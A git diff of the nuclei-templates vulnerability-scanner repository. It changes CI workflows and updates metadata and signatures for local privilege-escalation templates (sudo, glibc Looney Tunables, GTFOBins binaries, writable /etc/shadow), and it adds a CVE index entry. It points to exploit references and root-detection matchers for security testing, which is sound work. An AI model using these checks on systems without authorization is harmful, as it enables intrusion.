diff --git a/.github/workflows/cache-purge.yml b/.github/workflows/cache-purge.yml deleted file mode 100644 index 1432e0b73f..0000000000 --- a/.github/workflows/cache-purge.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: 🗑️ Cache Purge - -on: - push: - tags: - - '*' - workflow_dispatch: - -jobs: - deploy: - runs-on: ubuntu-latest - if: github.repository == 'projectdiscovery/nuclei-templates' - steps: - # Wait for 5 minutes - - name: Wait for 2 minutes - run: sleep 120 - - - name: Purge cache - uses: jakejarvis/cloudflare-purge-action@master - env: - CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }} - CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }} \ No newline at end of file diff --git a/.github/workflows/syntax-checking.yml b/.github/workflows/syntax-checking.yml index 96947c547c..e538a4a805 100644 --- a/.github/workflows/syntax-checking.yml +++ b/.github/workflows/syntax-checking.yml @@ -9,6 +9,7 @@ on: jobs: build: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@v4 - name: Yamllint diff --git a/.github/workflows/template-sign.yml b/.github/workflows/template-sign.yml index e61b2d7f09..3e2daae036 100644 --- a/.github/workflows/template-sign.yml +++ b/.github/workflows/template-sign.yml @@ -11,6 +11,7 @@ on: jobs: build: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@v4 with: diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 0df4a5ea3c..13a64741d8 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -9,6 +9,7 @@ on: jobs: build: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@v4 with: diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 897666522d..6f25ab5bff 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -9,6 +9,7 @@ on: jobs: build: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@v4 with: diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f5db5acabc..396d848f79 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2023/CVE-2023-42344.yaml' - 'http/cves/2023/CVE-2023-45671.yaml' - 'http/cves/2023/CVE-2023-48777.yaml' + - 'http/cves/2023/CVE-2023-6895.yaml' - 'http/cves/2024/CVE-2024-0305.yaml' - 'http/cves/2024/CVE-2024-0713.yaml' - 'http/cves/2024/CVE-2024-1021.yaml' @@ -25,7 +26,9 @@ on: - 'http/default-logins/ibm/ibm-dcec-default-login.yaml' - 'http/default-logins/ibm/ibm-dsc-default-login.yaml' - 'http/default-logins/ibm/ibm-hmc-default-login.yaml' + - 'http/default-logins/ibm/imm-default-login.yaml' - 'http/exposed-panels/c2/meduza-stealer.yaml' + - 'http/exposed-panels/cisco-unity-panel.yaml' - 'http/exposed-panels/connectwise-panel.yaml' - 'http/exposed-panels/fortinet/fortiauthenticator-detect.yaml' - 'http/exposed-panels/ibm/ibm-dcec-panel.yaml' @@ -38,6 +41,7 @@ on: - 'http/exposed-panels/opinio-panel.yaml' - 'http/exposed-panels/rocketchat-panel.yaml' - 'http/exposures/configs/sphinxsearch-config.yaml' + - 'http/misconfiguration/cloudflare-rocketloader-htmli.yaml' - 'http/misconfiguration/installer/connectwise-setup.yaml' - 'http/technologies/ibm/ibm-decision-runner.yaml' - 'http/technologies/ibm/ibm-decision-server-runtime.yaml' @@ -49,6 +53,7 @@ on: workflow_dispatch: jobs: triggerRemoteWorkflow: + if: github.repository == 'projectdiscovery/nuclei-templates' runs-on: ubuntu-latest steps: - name: Trigger Remote Workflow with curl diff --git a/.github/workflows/wordpress-plugins-update.yml b/.github/workflows/wordpress-plugins-update.yml index ac59e51074..649e928454 100644 --- a/.github/workflows/wordpress-plugins-update.yml +++ b/.github/workflows/wordpress-plugins-update.yml @@ -6,6 +6,7 @@ on: jobs: Update: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - name: Check out repository code uses: actions/checkout@v4 diff --git a/.new-additions b/.new-additions index 48466dad65..867ea6a73d 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-38203.yaml http/cves/2023/CVE-2023-42344.yaml http/cves/2023/CVE-2023-45671.yaml http/cves/2023/CVE-2023-48777.yaml +http/cves/2023/CVE-2023-6895.yaml http/cves/2024/CVE-2024-0305.yaml http/cves/2024/CVE-2024-0713.yaml http/cves/2024/CVE-2024-1021.yaml @@ -20,7 +21,9 @@ http/default-logins/ibm/ibm-dcbc-default-login.yaml http/default-logins/ibm/ibm-dcec-default-login.yaml http/default-logins/ibm/ibm-dsc-default-login.yaml http/default-logins/ibm/ibm-hmc-default-login.yaml +http/default-logins/ibm/imm-default-login.yaml http/exposed-panels/c2/meduza-stealer.yaml +http/exposed-panels/cisco-unity-panel.yaml http/exposed-panels/connectwise-panel.yaml http/exposed-panels/fortinet/fortiauthenticator-detect.yaml http/exposed-panels/ibm/ibm-dcec-panel.yaml @@ -33,6 +36,7 @@ http/exposed-panels/openvas-panel.yaml http/exposed-panels/opinio-panel.yaml http/exposed-panels/rocketchat-panel.yaml http/exposures/configs/sphinxsearch-config.yaml +http/misconfiguration/cloudflare-rocketloader-htmli.yaml http/misconfiguration/installer/connectwise-setup.yaml http/technologies/ibm/ibm-decision-runner.yaml http/technologies/ibm/ibm-decision-server-runtime.yaml diff --git a/.nuclei-ignore b/.nuclei-ignore index ddaae06f78..65c1838471 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -32,3 +32,6 @@ files: - http/cves/2020/CVE-2020-28351.yaml - http/vulnerabilities/oracle/oracle-ebs-xss.yaml - http/cves/2021/CVE-2021-28164.yaml + - http/fuzzing/wordpress-themes-detect.yaml + - http/fuzzing/mdb-database-file.yaml + - http/fuzzing/iis-shortname.yaml \ No newline at end of file diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml index 7383293454..2a8c21ffbb 100644 --- a/code/cves/2019/CVE-2019-14287.yaml +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -9,11 +9,22 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287 - https://www.exploit-db.com/exploits/47502 + - http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html + - http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html + - http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-14287 + cwe-id: CWE-755 + epss-score: 0.34299 + epss-percentile: 0.96958 + cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - vendor: canonical - product: ubuntu_linux + vendor: sudo_project + product: sudo tags: cve,cve2019,sudo,code,linux,privesc,local,canonical self-contained: true @@ -36,4 +47,4 @@ code: - '!contains(code_1_response, "root")' - 'contains(code_2_response, "root")' condition: and -# digest: 4b0a00483046022100f4f8e722b5f42a0123c6f1f8f54ac645f9d05fcd3cfef40c38b610291978a5e00221009d44ff15e4eea65e3fcb18aeece52355879b009f9a7246c145abdaf23807e2ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205d953c6f0c1352f39f1035d518dc38cffe2165dfb1f4ddd270434e7dbb790c1102200423935d03c0eafff4702b083c0d5da821affb591901209cd6d087644114abdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2021/CVE-2021-3156.yaml b/code/cves/2021/CVE-2021-3156.yaml index 3004515a10..ff8dab6fe8 100644 --- a/code/cves/2021/CVE-2021-3156.yaml +++ b/code/cves/2021/CVE-2021-3156.yaml @@ -10,8 +10,20 @@ info: - https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435 - https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit - https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff + - http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html + - http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2021-3156 + cwe-id: CWE-193 + epss-score: 0.97085 + epss-percentile: 0.99752 + cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:* metadata: verified: true + vendor: sudo_project + product: sudo tags: cve,cve2021,sudo,code,linux,privesc,local,kev self-contained: true @@ -28,4 +40,4 @@ code: - "malloc(): memory corruption" - "Aborted (core dumped)" condition: and -# digest: 490a00463044022074b8ca1a10aca438432f3b6e55023b9c80357eb5a6f2ac795774b7d44e85188e02201a3af75f86a975548121afe1ab1faf6ade2d1e89d05200b4e6990e97af56af36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220494a1c88897c9697f8d55a15b5ba0990a64225974efa03ca485ae5ebe4c2bcf0022019eb5fcd9dd61429f3964b64b263aec23e0193b30d695284d275818b9c38812d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml index 8554bd8a9d..ea23ad4579 100644 --- a/code/cves/2023/CVE-2023-2640.yaml +++ b/code/cves/2023/CVE-2023-2640.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.8 cve-id: CVE-2023-2640 cwe-id: CWE-863 - epss-score: 0.00047 - epss-percentile: 0.14754 + epss-score: 0.00174 + epss-percentile: 0.53697 cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:* metadata: verified: true @@ -54,4 +54,4 @@ code: - '!contains(code_1_response, "(root)")' - 'contains(code_2_response, "(root)")' condition: and -# digest: 4a0a00473045022100a20c4d30517d6bd96f1a97d3fca9e29bd1f686eeb9192a3f503a5bddffeda9fe022020188e4f25e79706197eab61598d64679c02828a0aedf7f496b5fbe14707ec90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-4911.yaml b/code/cves/2023/CVE-2023-4911.yaml index 130d2597cb..d96f5b0e87 100644 --- a/code/cves/2023/CVE-2023-4911.yaml +++ b/code/cves/2023/CVE-2023-4911.yaml @@ -10,16 +10,21 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-4911 - https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt - https://www.youtube.com/watch?v=1iV-CD9Apn8 + - http://www.openwall.com/lists/oss-security/2023/10/05/1 + - http://www.openwall.com/lists/oss-security/2023/10/13/11 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2023-4911 - cwe-id: CWE-787 - cpe: cpe:2.3:a:gnu:glibc:-:*:*:*:*:*:*:* + cwe-id: CWE-787,CWE-122 + epss-score: 0.0171 + epss-percentile: 0.87439 + cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: glibc - tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local + vendor: gnu + product: glibc + tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev self-contained: true code: @@ -34,4 +39,4 @@ code: - type: word words: - "139" # Segmentation Fault Exit Code -# digest: 4a0a004730450220420ab1d35c89225b917a344669e743fa83b79698910c4f87a5124f2dfaae54cd022100d122ece9eaba7f9bfc32d229e79d56b127da02ce4e5cf4034ecebfd9da56a9a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-6246.yaml b/code/cves/2023/CVE-2023-6246.yaml index d4dc164656..25c06d08fb 100644 --- a/code/cves/2023/CVE-2023-6246.yaml +++ b/code/cves/2023/CVE-2023-6246.yaml @@ -9,15 +9,21 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-6246 - https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt + - https://access.redhat.com/security/cve/CVE-2023-6246 + - https://bugzilla.redhat.com/show_bug.cgi?id=2249053 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/ classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2023-6246 - cwe-id: CWE-787 + cwe-id: CWE-787,CWE-122 + epss-score: 0.00383 + epss-percentile: 0.72435 cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: glibc + vendor: gnu + product: glibc tags: cve,cve2023,code,glibc,linux,privesc,local self-contained: true @@ -33,4 +39,4 @@ code: - type: word words: - "127" # Segmentation Fault Exit Code -# digest: 4a0a00473045022100fec914f6ee85b53ab611e26476cba7da42e11cdcb33c935a2d003c74c7312b1302207b65c84f8435932f1aa050019f6aaf899442187cf9630df934cf9086bd94a2f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-choom.yaml b/code/privilege-escalation/linux/binary/privesc-choom.yaml index e1ace50aba..fa9675d582 100644 --- a/code/privilege-escalation/linux/binary/privesc-choom.yaml +++ b/code/privilege-escalation/linux/binary/privesc-choom.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/choom/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,choom,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4a0a0047304502203b1238ca7d9be64f51e9162022deaf76b02898053cbb3511377e76228d3d79ef0221008b6aa349a17b0a16a0d0949f1797c8e111d2498185b88fe99c326c60c59167c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd0a7dc9b51ef8f3f850d3fde75e025e13c61b464ac044825ac70107c66db1de0220290c09bd78a4e25f5cabc659f9441a3c168a1ca2c226f0ddf9316de01eb30461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-find.yaml b/code/privilege-escalation/linux/binary/privesc-find.yaml index 83be694188..ed1fd52b51 100644 --- a/code/privilege-escalation/linux/binary/privesc-find.yaml +++ b/code/privilege-escalation/linux/binary/privesc-find.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/find/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,find,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4b0a0048304602210093227e768a659e1747e4dd5d82e25ade3f152549f159b967327082c90677fc5e022100ba7d7a12344d88ac9ec3c0832b25af9d1ef25fe4470e6963b2f3ae814c844e89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f55b1ac220ad114cf5cd2341a388a3860f134489b662ff708d8553b7156207a02201bddad6e9a46aa5b077f01de8b269b2797007741d8c6f38b9ddc7724462497e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-lua.yaml b/code/privilege-escalation/linux/binary/privesc-lua.yaml index c5d43374de..341fbb7fa5 100644 --- a/code/privilege-escalation/linux/binary/privesc-lua.yaml +++ b/code/privilege-escalation/linux/binary/privesc-lua.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/lua/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,lua,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4a0a00473045022033fd3387c3085b4f8e3a7ced68a4e324ba82f7e683a8c29e5ab32c1975a8fe4b02210097eb732caf95609123a361436265388bba8c2c95fcba6ddaf6504d3a5b19c19f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ed356f302529ce69de66a24987b78693c5d679a4340425ad29a76fa63db81ab022100a1157d5ab30c98ef4366d8cba600703686a43211b15ce7d17e4fc07a79db5a8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-mysql.yaml b/code/privilege-escalation/linux/binary/privesc-mysql.yaml index 6865f91dbf..50a454b6d9 100644 --- a/code/privilege-escalation/linux/binary/privesc-mysql.yaml +++ b/code/privilege-escalation/linux/binary/privesc-mysql.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/mysql/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,mysql,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4b0a00483046022100fa6772f8e48a5c9ac87ddba3ecc262a59d16d9cba527623da8f5cdf9509e44880221008cff1c5a77c27a1f59d943884498c8d1499da98e6ecf7e1d63851de4ae9fa76c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205cfddd58041ea672c83a850b34e77b9b635e71f934118d2a1ab9ab3ca660e13b022100eec2e1232af1d0b4686fc284278197db41fa3a289488abb2936a1186b85e3e26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-node.yaml b/code/privilege-escalation/linux/binary/privesc-node.yaml index ebb32c926c..26c6458229 100644 --- a/code/privilege-escalation/linux/binary/privesc-node.yaml +++ b/code/privilege-escalation/linux/binary/privesc-node.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/node/ metadata: - max-request: 4 verified: true + max-request: 4 tags: code,linux,node,privesc,local self-contained: true @@ -53,4 +53,4 @@ code: - 'contains(code_3_response, "root")' - 'contains(code_4_response, "root")' condition: or -# digest: 4b0a00483046022100e32f25ba4a83d9d265aa187532f0090ba2fdf1beb89235113b4caeed36413ac30221008ecd529618da3ad2ed65e939b4233529614a005b87fd760bbeeb95de2e78746f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c2fb7e0f1c8874aa30b7cbf614269bbd607e7679a738d4e4b6e6d5cafdf8faa1022100af88ace2a97d251334aeefafdfbd07471443304b4505d49f1edf432f53b5e43a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-rc.yaml b/code/privilege-escalation/linux/binary/privesc-rc.yaml index 8136f4c0bf..8062db6e4f 100644 --- a/code/privilege-escalation/linux/binary/privesc-rc.yaml +++ b/code/privilege-escalation/linux/binary/privesc-rc.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/rc/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,rc,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4a0a004730450220665e08a8d241b76abc6c9f908b6c953eeebccc153af1c165958c388f1a57c3eb02210091d8e2364f4c48b2fd9d8b64222760ce398677386e5d185fc86425ea5ed10527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a315bdc26f4d35efa4a6f698d5324b05e6f7d849772f27996dd0e04ac0edd5b022100cb3566b03c81b4ced70cb1bf221db42da3f9262c3ce4790664bc215a0b623abf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-run-parts.yaml b/code/privilege-escalation/linux/binary/privesc-run-parts.yaml index 31b208a6d7..4cf9ce7a08 100644 --- a/code/privilege-escalation/linux/binary/privesc-run-parts.yaml +++ b/code/privilege-escalation/linux/binary/privesc-run-parts.yaml @@ -8,8 +8,8 @@ info: The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner. reference: https://gtfobins.github.io/gtfobins/run-parts/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,run-parts,privesc,local self-contained: true @@ -45,4 +45,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 490a00463044022055bdbe38258f303b3247dcaaec655d2aca77ff0d5e3d83a8e763840384618a7c02204591a5abce03bc68b647b84a4a4fd59da6d3713256d3494aadc43cf2076778dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058411677d700beae571edc83b5da8ff31eaa193dac73ba1515a220842ccabc8d0220151cca60c8ad28b2934984be7d6a187d3dd02ee9cac9a5cc3cd0af97273c6bca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-strace.yaml b/code/privilege-escalation/linux/binary/privesc-strace.yaml index e5a895596b..8f316ba816 100644 --- a/code/privilege-escalation/linux/binary/privesc-strace.yaml +++ b/code/privilege-escalation/linux/binary/privesc-strace.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/strace/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,strace,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4a0a004730450221008a56962d3e0bfec8153fae52f4693ee5b8065098d3b7c5e16b5c2f481dcaaeb8022077e7fc1be8079fde76cbf09b10718038a4e013725c9955a91d5b024d02bdd27f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b121064fdd29dfb40970b3956fcfb830cc7150f895b56913870f21c1f2f5e85022100fd214757ef5ac44a07cfc6fcdcf6da1fe59cd2b44f98829f01fc6af0c58045d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-torify.yaml b/code/privilege-escalation/linux/binary/privesc-torify.yaml index 51eb949675..93ce6aa580 100644 --- a/code/privilege-escalation/linux/binary/privesc-torify.yaml +++ b/code/privilege-escalation/linux/binary/privesc-torify.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/torify/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,torify,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4a0a00473045022100fe967badaa42178c43d6c5f965ebd2205cd5636ddceeece364aedd793b317d1902207ad0bc797b16421928d1ec9016ba53809758b9f7603effab908a27decbc3cc74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ca7aa24f7f8fa13b8d43c96981d8fd78a382752f6e2c69dfab164443972b747022100d307d8b9c2054d4731db696fc13198afed46d5b1215a6899b56533661240fc91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-view.yaml b/code/privilege-escalation/linux/binary/privesc-view.yaml index 67551216c4..5accdeea7e 100644 --- a/code/privilege-escalation/linux/binary/privesc-view.yaml +++ b/code/privilege-escalation/linux/binary/privesc-view.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/view/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,view,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 490a0046304402207dc9a1ca06fcde2705d1a72ee2f792eff2f81f5d00def77fa54eec5d7717c19e02200c984a4f0d0cf94baa16c355ab52265f3dd281cac5bdd92f8ef9242efc087166:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed64ed48009962a92006b2ce803d0c5189e91ced727a841bc8c31e5d98d1a9b5022009f19b7df531fecde9b1303555d1ec29ba63a49ca1c439b6f48f46552d2d4bb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-xargs.yaml b/code/privilege-escalation/linux/binary/privesc-xargs.yaml index 23db34f78b..2ed01bb5a3 100644 --- a/code/privilege-escalation/linux/binary/privesc-xargs.yaml +++ b/code/privilege-escalation/linux/binary/privesc-xargs.yaml @@ -9,8 +9,8 @@ info: reference: - https://gtfobins.github.io/gtfobins/xargs/ metadata: - max-request: 3 verified: true + max-request: 3 tags: code,linux,xargs,privesc,local self-contained: true @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 490a0046304402205fac35cdd5142e3afd382d38b77be0b7105cfc23884e7ac5cbba8aa91cfc2bb002202b6c7ebae29c5c300052a85a39f3e30b71788d590bc40b797c1ee96c1f00f267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052f887093022e061b40da1eae5a8b4aa8a5f267dfd5f22db005a9076db73cc9a02210093f126e5d0229cf686f3c547dc3466e89afb2a7bf57bbeb790acf65376fcd047:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/rw-shadow.yaml b/code/privilege-escalation/linux/rw-shadow.yaml index 0fee852708..0a004a3a05 100644 --- a/code/privilege-escalation/linux/rw-shadow.yaml +++ b/code/privilege-escalation/linux/rw-shadow.yaml @@ -7,8 +7,8 @@ info: reference: - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow metadata: - max-request: 2 verified: true + max-request: 2 tags: code,linux,privesc,local self-contained: true @@ -42,4 +42,4 @@ code: words: - "Not readable and not writable" negative: true -# digest: 490a004630440220516036fa8622068621421ac043a6fb20b6551a6ca3d7851726474cfff7e4d9f902205a1a9ce09b5827f39e2311e6716793a917e29383f5e4d4a4b9a56925afa68e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206152b0b3fe7a164b5583cb921d799f47fdcf9f30da2c32cbbb7248aa7068a13102200b3f49d97a93659dc9f1b56c518921e7e3597478d55eddb1cfc6a76dd45cb968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cves.json b/cves.json index f9d5082a95..58062848e9 100644 --- a/cves.json +++ b/cves.json @@ -265,6 +265,7 @@ {"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"} {"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"} {"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"} +{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"} {"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"} {"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 